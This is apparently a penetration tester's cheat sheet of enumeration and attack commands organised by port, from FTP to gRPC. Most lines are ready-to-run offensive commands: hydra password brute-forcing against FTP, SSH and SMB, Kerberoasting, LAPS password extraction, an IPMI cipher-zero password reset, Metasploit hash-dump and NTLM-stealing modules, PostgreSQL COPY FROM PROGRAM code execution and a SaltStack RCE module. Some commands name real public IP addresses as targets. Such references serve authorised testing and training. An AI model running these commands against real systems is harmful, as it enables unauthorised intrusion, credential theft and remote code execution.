Ports & Enumeration
Quick list of enumeration commands, grouped by service and port
FTP / Port 21:
ftp -a IP
ftp ftp://USER:PASS@IP
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000.txt -e nsr -s 21 ftp://URL
SSH / Port 22:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000.txt -e nsr -s 22 SSH://URL
Telnet / Port 23:
nc -vv IP PORT
SMTP / Port 25:
nc -vv IP 25
echo EHLO
RCPT TO: brian@Fake.com
MAIL FROM: client@client.com
data
pwned
.
swaks -n -hr -f chris@example.org -t blah@nintendo.com -s smtpgw1.nintendo.com:25
DNS / Port 53:
host -t axfr URL
dnsrecon -d URL -t axfr
dnsenum URL
TFTP/port 69:
nmap -n -Pn -sU -p69 -sV --script tftp-enum <IP>
HTTP/s port 80/8080/8000/443/8443:
nikto -host URL:PORT -C all
feroxbuster -u URL:PORT -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o OUTPUT.txt
gobuster dir -u URL:PORT -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
wpscan --url URL:PORT --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive
whatweb --color=never --no-errors -a 3 -v URL:PORT
wkhtmltoimage --format png URL:PORT OUTPUT.png
curl -sSikf URL:PORT/robots.txt
Kerberos/ port 88:
crackmapexec ldap IP --kerberoast
POP3/ port 111/ 995:
USER username
PASS password
LIST
RETR 1
IDENT/ port 113:
apt install ident-user-enum
ident-user-enum IP PORT-TO-QUERY
ident-user-enum IP 22 100000
RPC/ port 135:
rpcmap -U '' IP
rsysinfo 192.168.10.1
nmap -sSUC -p111 192.168.10.1
rusers -l 192.168.10.1
SMB/ port 137-139/445:
smbmap -H IP
smbclient '\\IP\' -L
smbclient '\\IP\SHARE'
crackmapexec smb IP --shares
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000.txt -e nsr -s 445 SMB://URL
SNMP / Port 161:
snmp-check IP
snmpwalk -v 1 -c public 192.168.0.42
snmpwalk -c public 192.168.102.251 .1.3.6.1.4.1.77.1.2.25
.1.3.6.1.2.1.1.5 Hostname
.1.3.6.1.4.1.77.1.4.2 Domain name
.1.3.6.1.4.1.77.1.2.25 Usernames
.1.3.6.1.4.1.77.1.2.3.1.1 Running services
.1.3.6.1.4.1.77.1.2.27 Share information
LDAP/ Port 389/636:
ldapsearch -x -h IP -D '' -w '' -b "DC=DOMAIN,DC=DOMAIN" | grep sAMAccountName:
ldapsearch -v -x -D USER@DOMAIN -w PASSWD -b "DC=DOMAIN,DC=DOMAIN" -h IP "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
GetADUsers.py DOMAIN/ -dc-ip IP -all | awk '{print $1}' | tee users.txt
GetNPUsers.py DOMAIN/ -dc-ip IP -usersfile users.txt
GetUserSPNs.py DOMAIN/ -dc-ip IP
GetUserSPNs.py hutch.offsec/ -dc-ip 192.168.76.122 -usersfile users.txt -request
Get-GPPPassword.py USER:PASS@IP
HTTPS / Port 443+:
# TLS extensions
openssl s_client -tlsextdebug -connect www.google.com:443
# ssl resumption
sslyze --resum www.163.com:443
# ssl renegotiation
sslyze --reneg www.ibm.com:443
# cert info
openssl s_client -connect www.google.com:443
# compression
sslyze --compression www.google.com:443
# tls fallback
openssl s_client -connect www.example.com:443 -no_tls1_2 -fallback_scsv
# known ssl key
nmap -p443 --script ssl-known-key 192.168.0.15
Apple Filing Protocol (AFP) / Port 548:
# Nmap scripts:
# Lists available AFP volumes and files
afp-ls
# Lists all AFP volumes and files
afp-path-vuln
# Displays AFP server information
afp-serverinfo
afp-showmount
IPMI / Port 623 (UDP):
use auxiliary/scanner/ipmi/ipmi_version
use auxiliary/scanner/ipmi/ipmi_dumphashes
use auxiliary/scanner/ipmi/ipmi_cipher_zero
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123
RTSP / Port 554:
docker run -t ullaakut/cameradar
docker run -t ullaakut/cameradar -t 80.169.239.143 -p 554
Rsync / Port 873:
rsync -rdt rsync://IP:PORT
rsync -av USER@IP::FOLDER/ .
MsSQL / Port 1433:
git clone https://github.com/NetSPI/PowerUpSQL
import-module ./powerupsql.ps1
$user = "publicuser"
$pass = "GuestUserCantWrite1"
$i = "10.10.11.202,1433"
Invoke-SQLAudit -verbose -instance $i -username $user -password $pass
# Enumerate server configuration
mssql_enum
# Local privilege escalation
mssql_escalate_dbowner
mssql_escalate_execute_as
# Crawl available databases for useful content
mssql_findandsampledata
# Extract encrypted user password hashes
mssql_hashdump
# Search the database for interesting data
mssql_idf
# Add privileged local user accounts
mssql_local_auth_bypass
# Exploit linked database servers
mssql_linkcrawler
# Steal NTLM service credentials via SMB
mssql_ntlm_stealer
# Execute OS commands via xp_cmdshell
mssql_payload
# Extract the database schema
mssql_schemadump
# Load and execute SQL statements from a file
mssql_sql_file
Oracle Transparent Network Substrate (TNS) / Port 1521:
# Get versioning
tnscmd10g version -h 10.11.21.25
# useful commands:
# Ping the listener
ping
# Provide output of the listener version and platform information
version
# Return the current status and variables used by the listener
status
# Dump service data
services
# Dump debugging information to the listener log
debug
# Reload the listener configuration file
reload
# Write the listener configuration file to a backup location
save_config
# Invoke listener shutdown
stop
# Metasploit modules:
use auxiliary/scanner/oracle/sid_enum
use auxiliary/scanner/oracle/sid_brute
nmap -p1521 --script oracle-brute --script-args oracle-brute.sid=TEST
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
# authenticate:
# download and save
/opt/oracle/instantclient-basic-linux-XXXX.zip
/opt/oracle/instantclient-sqlplus-linux-XXXX.zip
export PATH=$PATH:/opt/oracle/instantclient_12_1
export SQLPATH=/opt/oracle/instantclient_12_1
export TNS_ADMIN=/opt/oracle/instantclient_12_1
export LD_LIBRARY_PATH=/opt/oracle/instantclient_12_1
export ORACLE_HOME=/opt/oracle/instantclient_12_1
# login
sqlplus perfstat/perfstat@10.11.21.20:1521/TEST
NFS / port 2049:
showmount -e IP
mount -t nfs -o vers=2 -o nolock IP:/home /nfs
iSCSI / Port 3260:
nmap -p3260 --script iscsi-brute 192.168.56.5
MySQL / Port 3306:
# brute login
use auxiliary/scanner/mysql/mysql_login
# Return the basic configuration and server settings
mysql_enum
# Extract username and password hash values
mysql_hashdump
# mysql_start_up Execute OS commands (Windows)
mysql_payload
# Display the database schema
mysql_schemadump
# Execute arbitrary SQL statements
mysql_sql
ZeroMQ ZMTP / port 4505/4506:
msfconsole: linux/misc/saltstack_salt_unauth_rce
SIP/ Port 5060:
smap -o PBX
# enum potential hosts
svmap.py 192.168.1.1/24
# user enum
svwar.py -e100-300 PBX-IP -m INVITE
# sniff traffic and output a pcap
sidump auth.txt -p auth.pcap
# crack the hashes
sipcrack auth.txt -w wordlist.txt
# nmap and grab mac address the capture call (will output in wav format)
ucsniff -i eth9 -T
# Metasploit
use auxiliary/sip_invite_spoof
PostgreSQL / Port 5432:
# brute user
use auxiliary/scanner/postgres/postgres_login
# login
psql -h IP -U USER
# list databases
\list
# connect to database
\c DATABASE
# list tables
\dt
SELECT usename, passwd FROM pg_shadow;
pg_dump --host=IP --username=USER --password --dbname=DB --table='TABLE' -f output_pgdump
## Code Execution
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'CODE';
SELECT * FROM cmd_exec;
# Metasploit modules
# Execute arbitrary SQL statements
postgres_sql
# Extract username and password hash values
postgres_hashdump
# Display the database schema
postgres_schemadump
# Import a local file and display it (e.g., /etc/passwd)
postgres_readfile
# Load a shared object via pg_largeobject and create a UDF to execute arbitrary code on the server side
postgres_payload
Redis / Port 6379:
# auth
redis-cli -h 109.206.167.35
# get keys
keys *
WSUS/ port 8530 & 8531:
SharpWSUS
pyWSUS
Memcache/ port 11211:
echo "version" | nc -vn -w 1 <IP> 11211 #Get version
echo "stats" | nc -vn -w 1 <IP> 11211 #Get status
echo "stats slabs" | nc -vn -w 1 <IP> 11211 #Get slabs
echo "stats items" | nc -vn -w 1 <IP> 11211 #Get items of slabs with info
echo "stats cachedump <number> 0" | nc -vn -w 1 <IP> 11211 #Get key names (the 0 is for unlimited output size)
echo "get <item_name>" | nc -vn -w 1 <IP> 11211 #Get saved info
# Metasploit modules:
use auxiliary/gather/memcached_extractor
MongoDB / Port 27017:
mongo mongodb://USER:PASS@IP:PORT/
show dbs
use DB
show tables
db.TABLE.find()
gRPC / Port 50051:
https://github.com/fullstorydev/grpcui
https://github.com/fullstorydev/grpcurl